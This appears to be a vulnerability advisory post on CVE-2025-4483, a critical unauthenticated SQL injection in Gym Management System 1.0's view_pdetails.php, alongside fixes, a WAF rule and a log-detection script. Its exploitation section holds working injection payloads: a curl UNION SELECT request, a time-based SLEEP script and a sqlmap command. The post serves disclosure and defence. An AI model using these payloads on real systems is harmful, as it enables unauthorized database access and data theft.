Gym Management System 1.0, SQL Injection, CVE-2025-4483 (Critical)

How CVE-2025-4483 Works

This vulnerability stems from improper input sanitization of the `ID` parameter of `/view_pdetails.php` in Gym Management System 1.0. Attackers inject malicious SQL through crafted HTTP requests and manipulate database operations. Because the query is built without prepared statements, the flaw allows unauthorized data access, modification, or deletion. Remote exploitation is possible without authentication, leading to full database compromise. The CVSS 4.0 vector (AV:N/AC:L/PR:N/UI:N) confirms network-based attacks with low complexity.

DailyCVE Form

Platform: Gym Management System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/13/2025

What Undercode Say:

Exploitation

1. Craft SQL Payload:

' OR 1=1--

2. Exploit via cURL:

curl "http://target.com/view_pdetails.php?ID=1'+UNION+SELECT+1,user(),3--"

3. Automated Attack:

import requests
payload = "1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--"
response = requests.get(f"http://target.com/view_pdetails.php?ID={payload}")

Protection

1. Input Sanitization:

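// Escaping only protects values placed inside quotes in the query; prefer the prepared statement below.
$id = mysqli_real_escape_string($conn, $_GET['ID']);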

2. Prepared Statements:

$stmt = $conn->prepare("SELECT * FROM members WHERE id = ?");
$stmt->bind_param("i", $_GET['ID']); // "i" binds the value as an integer
$stmt->execute();

3. WAF Rules:

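location ~ \.php$ {
    modsecurity on;
    # ModSecurity requires a unique rule id; 1001 is an arbitrary local value
    modsecurity_rules 'SecRule ARGS "@detectSQLi" "id:1001,phase:2,deny,status:403"';
}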

Analytics

  • Detection: Log monitoring for repeated UNION/SLEEP patterns.
  • Mitigation: Patch via vendor update or disable `/view_pdetails.php` if unused.
  • Tool: SQLmap command:
    sqlmap -u "http://target.com/view_pdetails.php?ID=1" --risk=3
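
The log-monitoring detection listed above, as an added example (not code from the original post or the vendor). It assumes combined-format access logs and that legitimate `ID` values are plain integers, as the `"i"` bind in the prepared statement implies; the log lines, IP addresses and function names are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [13/May/2025:10:01:02 +0000] "GET /view_pdetails.php?ID=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [13/May/2025:10:01:05 +0000] "GET /view_pdetails.php?ID=1%27+UNION+SELECT+1,user(),3-- HTTP/1.1" 200 4312 "-" "curl/8.5.0"
203.0.113.9 - - [13/May/2025:10:01:09 +0000] "GET /view_pdetails.php?ID=1%27%20AND%20(SELECT%201%20FROM%20(SELECT%20SLEEP(5))a)-- HTTP/1.1" 200 4300 "-" "python-requests/2.31"
198.51.100.7 - - [13/May/2025:10:02:00 +0000] "GET /index.php?page=union HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.7 - - [13/May/2025:10:02:11 +0000] "GET /view_pdetails.php?ID=abc HTTP/1.1" 200 4300 "-" "Mozilla/5.0"
"""

TARGET = "/view_pdetails.php"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3}')
INT_RE = re.compile(r"\d+", re.ASCII)  # what a legitimate ID looks like (assumption)
SQL_HINTS = re.compile(r"\b(union|select|sleep|benchmark)\b|--|'", re.I)

def suspicious_requests(log_text):
    """Yield (ip, decoded ID, reason) for requests to TARGET whose ID is not an integer."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, uri = m.groups()
        parts = urlsplit(uri)
        if parts.path != TARGET:
            continue
        # parse_qs URL-decodes the value, so %27 and '+' encodings are normalised first.
        for value in parse_qs(parts.query, keep_blank_values=True).get("ID", []):
            if INT_RE.fullmatch(value):
                continue
            reason = "sqli-keyword" if SQL_HINTS.search(value) else "non-integer"
            yield ip, value, reason

def repeat_offenders(log_text, threshold=2):
    """Return {ip: count} for sources with at least `threshold` suspicious requests."""
    counts = Counter(ip for ip, _, _ in suspicious_requests(log_text))
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
    print(repeat_offenders(SAMPLE_LOG))
```

Matching on the decoded value rather than the raw log line keeps the check from being bypassed by simple URL encoding of the keywords.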
    

Sources:

Reported By: nvd.nist.gov